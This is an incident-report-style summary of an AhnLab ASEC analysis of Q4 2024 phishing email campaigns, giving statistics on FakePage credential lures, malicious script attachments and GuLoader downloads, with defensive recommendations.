Full Report
Overview AhnLab SEcurity intelligence Center (ASEC) monitors phishing email threats with the automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the fourth quarter of 2024 (October, November, and December) and provide statistical information on each type. Generally, phishing is cited as an attack that […]
Analysis Summary
# Incident Report: Q4 2024 Phishing Campaigns via Email Attachments
## Executive Summary
During the fourth quarter of 2024 (October-December), threat actors heavily utilized phishing emails containing attachments to distribute credential-harvesting lures, primarily through **FakePage** templates (74% of threats). The primary attack vector involved deceptive web page scripts (HTML/SHTML) designed to mimic legitimate login screens to steal user credentials. While the detailed timeline of specific compromises is not provided, the pervasive nature of these attacks indicates widespread attempted credential theft across various organizations. Response efforts focused on monitoring and analysis by ASEC, leading to the classification and reporting of new attack types.
## Incident Details
- **Discovery Date:** Throughout Q4 2024 (Monitored automatically by ASEC's RAPIT system)
- **Incident Date:** Q4 2024 (October, November, December)
- **Affected Organization:** Not explicitly disclosed (General industry-wide analysis)
- **Sector:** General (Targeting users across various organizations)
- **Geography:** Not specified (Global reporting context)
## Timeline of Events
*Note: As this is a threat intelligence summary, specific infection dates are aggregated statistics rather than a singular event timeline.*
### Initial Access
- **Date/Time:** Throughout Q4 2024
- **Vector:** Phishing emails containing attachments.
- **Details:** Attachments were predominantly web page scripts (64%) or compressed files (21%) containing scripts (VBS, JS, BAT).
### Lateral Movement
- (Not detailed in the summary; assumed to follow successful credential harvesting or malware execution.)
### Data Exfiltration/Impact
- **Primary Goal:** Account credential harvesting via FakePage lures (74% of threats).
- **Secondary Goals:** Distribution of Trojans (12%), Downloaders (e.g., GuLoader, 10%), and Infostealers (2%).
### Detection & Response
- **How it was discovered:** Continuous monitoring via the AhnLab Security intelligence Center (ASEC) automatic sample analysis system (RAPIT) and honeypots.
- **Response actions taken:** Classification of attack types, statistical analysis, and public reporting to warn users about new and existing high-risk email keywords and attachment types.
## Attack Methodology
- **Initial Access:** Phishing emails with malicious attachments (Web Scripts, Compressed Files).
- **Persistence:** (If Trojans or Backdoors were successfully deployed, Persistence mechanisms would be employed, but specifics are not listed.)
- **Privilege Escalation:** (Not detailed, but implied if Trojans or Downloaders achieved full system execution.)
- **Defense Evasion:** (Implied through the use of script-based files designed to execute malicious code.)
- **Credential Access:** Primary method was **FakePage** lures (HTML/SHTML attachments) designed to trick users into entering credentials on deceptive login portals.
- **Discovery:** (Threat actors likely performed internal network reconnaissance post-compromise.)
- **Lateral Movement:** Downloaders like GuLoader were used to fetch additional malware, suggesting potential lateral movement or further system compromise.
- **Collection:** Primarily focused on gathering credentials via FakePage; Infostealers collected user information.
- **Exfiltration:** Credentials harvested from FakePages were transmitted to C2 servers.
- **Impact:** Compromised user accounts leading to potential information leaks, fraud, or further malware deployment.
## Impact Assessment
- **Financial:** (No specific costs reported.)
- **Data Breach:** User login account credentials (Targeted by FakePage attacks).
- **Operational:** Potential for disruption if Trojans and Downloaders successfully established persistence or executed destructive payloads.
- **Reputational:** Risk of damage associated with successful credential theft and subsequent fraud attempts.
## Indicators of Compromise
*Note: Specific IOCs were omitted as the report focused on statistical trends rather than a specific threat actor's campaign, but the following indicators were prevalent:*
- **Network indicators:** Communication to C2 servers (associated with credential harvesting or malware delivery).
- **File indicators:** Attachments ending in HTML, SHTML, HTM (representing FakePages), RAR, CAB, 7Z, ZIP (containing VBS, VBE, JS, BAT scripts).
- **Behavioral indicators:** Execution of scripts hidden within web page/compressed attachments; redirection to fake login pages; download of secondary payloads (e.g., by GuLoader).
## Response Actions
- **Containment:** (No specific organizational containment actions detailed, as the report is retrospective and analytical.)
- **Eradication:** (No specific eradication steps detailed.)
- **Recovery:** (Focus was on informing the public/analysts to prevent further infection.)
## Lessons Learned
- **Key takeaways:** Credential harvesting via FakePage lures utilizing web page scripts (HTML/SHTML) remains the dominant phishing technique (74% occurrence). There is a notable shift towards script-based attacks, evidenced by a 12% increase in script types used for account stealing compared to Q3 2024.
- **What could have been done better:** Increased user awareness and robust email filtering solutions capable of detecting and blocking or scanning attachments containing deceptive web content or known malicious scripts are crucial.
## Recommendations
- Implement advanced email filtering to scan attachments for obfuscated scripts (JS, VBS, BAT) often hidden within archive files or presented as HTML pages.
- Enhance mandatory multi-factor authentication (MFA) to mitigate the impact of stolen credentials harvested via FakePage attacks.
- Conduct targeted security awareness training focusing specifically on recognizing credential harvesting attempts embedded in realistic-looking login pages delivered via email attachments.